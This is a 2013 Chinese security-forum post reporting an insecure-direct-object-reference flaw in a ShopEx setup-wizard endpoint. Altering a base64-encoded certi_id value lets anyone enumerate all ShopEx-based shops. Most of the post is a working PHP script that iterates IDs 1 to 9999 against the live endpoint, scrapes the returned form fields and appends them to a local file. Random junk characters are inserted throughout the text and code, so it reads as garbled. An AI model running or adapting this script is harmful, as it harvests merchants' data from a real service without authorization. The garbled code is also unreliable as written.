找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2788|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
6 \1 j8 k/ l& {. Q5 @! ^2 K% ]ShopEx某接口缺陷,可遍历所有网站
# Q/ |5 S6 A- U2 |详细说明:. G! X+ \- l0 g( d7 _, e
问题出现在shopex 网店使用向导页面
" {0 Q# @' a) e+ G* m/ H: ]0 x" `. c2 t$ u8 z& c

+ P$ b1 H, q  u. W7 l; {
& M+ Z- ?* a6 U6 Z  h( P- Shttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
& B" Z' x+ r- F1 h1 g+ c, `
/ E% a  q9 e  h0 }
. k; C$ P9 [  k) e6 u( |
0 H0 |; k8 t* p1 y8 Arefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 S% z( {# l. T; E( l) @  `$ F2 p2 O- k( P2 j
2 Y2 _, S" ^9 f3 ]) m

9 I+ K* v( P4 W0 l我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 # `$ O2 j' u& ^  J; b/ c
0 m. I# A  F4 r2 j5 u

8 H; ]' W! g% K: j- V# x% \3 H! P! b. ]9 J) F- J9 ?/ ?
<?php# D2 b  R* Z/ A. [
+ Y+ Y$ X/ P2 o' Y. m
                for ($i=1; $i < 10000; $i++) { //遍历7 R  i7 \/ y/ Y- G& I! }
. Q1 K5 T2 h; b" m
                        ShowshopExD($i);
: T9 _: c& r. V7 ?! l' e0 ~- T
4 M# p/ P3 h6 u, ^" i* `                }0 B& c3 L8 M0 ^) M4 V5 H6 D

) v8 y6 D5 f& R+ \9 c                function ShowshopExD($cid) {# [- r4 ]8 `2 R% |4 E2 X8 z

- ^4 x. k, R* S- c  `% E                $url='http://guide.ecos.shopex.cn/step2.php';- d$ }; r! x! a$ d

: n( A: y: }7 j* A) Z                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');! D: f! s! `) U

# g9 z9 O8 i1 G2 z        $url = $url.'?refer='.$refer;) r4 n2 J6 j4 y/ G

9 ]& i" g( p& W& P# A        $ch = curl_init($url);
/ n* f8 U# r& W7 K( p. {
; Z! ^4 y3 c2 S: H2 v        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;& J4 k, Y, E" b, n

( \& b' A7 P( o        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;2 b5 ^- C/ p% L. k1 d+ ]
* l, Q  e3 q$ b! @- B
        $result = curl_exec($ch);, V3 Z  v4 M; ^' ]( k

3 f: q! z) e* R        $result = mb_convert_encoding($result, "gb2312", "UTF-8");, k' @) p- z4 f1 \
/ t- N1 Y7 h+ `$ E5 B' q' g- o
        if(strpos($result,$refer))
; j6 R: ]" |) F! W* [6 y
. }! W& A0 U1 U        {. v6 Y. t$ z& M1 c6 z" a
9 f1 r& P2 u8 R% d! n8 _
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件9 U' S7 q& u- k* N2 Y/ x# n! G5 M

8 d+ D$ v: V1 E! _+ P  V# ?3 I* K                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);: _; u% F+ e+ `' Y
) n/ r' d" ?9 O, Q" q( J" d
                foreach ($value[1] as $key) {
' l& A5 `6 V  s6 R. Z( _5 m0 S+ z
9 C. q) E: w6 X6 ~                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);; c7 _; L9 X5 M9 Z8 O; L  \

( h4 n+ ]/ Z( Q& x  F) S                        echo $res[1][0].':'.$res[3][0]."\r\n";2 h% u/ M  W7 Z
$ G7 z3 T' e. F& n% E# o/ J: h
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; , k# Q& U5 H( E* p: O9 `1 S" g2 L
' o$ p" U; v, T2 o* x/ [; I- _* Q
                        fwrite($fp, $col, strlen($col)); 3 m! _4 n1 N% h; u$ X
* H4 i. E) L+ `% E4 j+ `
                }) l7 z9 [% ^9 C" H1 N3 h" P7 b& M

9 S" T/ G3 r( J9 D                echo '--------------------------------'."\r\n";+ V* S( L- ~+ u
% ]! U# ?* }  T( H7 U% k
                fclose($fp);
# S+ i2 h* X7 v# p% N% O3 o
+ _. z2 J& S7 h) n2 Z0 B/ k9 _        }1 ?0 f% l3 {: I+ L; U! u" t
2 K" N# F, n" ^# R5 q4 y+ E
        flush();" G7 k- v  `; p
1 Z# |$ O) S! J
        curl_close($ch);) G+ U0 a  N# S9 ?. B: s6 v
7 x9 C+ n, ?) t% S) t! Q
                }! j. s9 d8 `2 j- y

5 v7 r) N% x9 ^; d0 d0 x, \?>
6 ?2 c8 ^6 G6 K3 R漏洞证明:5 L' A: l; Q0 H& S+ u# X
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg, e+ k6 u. b8 ]# b( ~0 ]9 T
refer换成其他加密方式/ G) e. M5 W& n9 B9 G1 J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表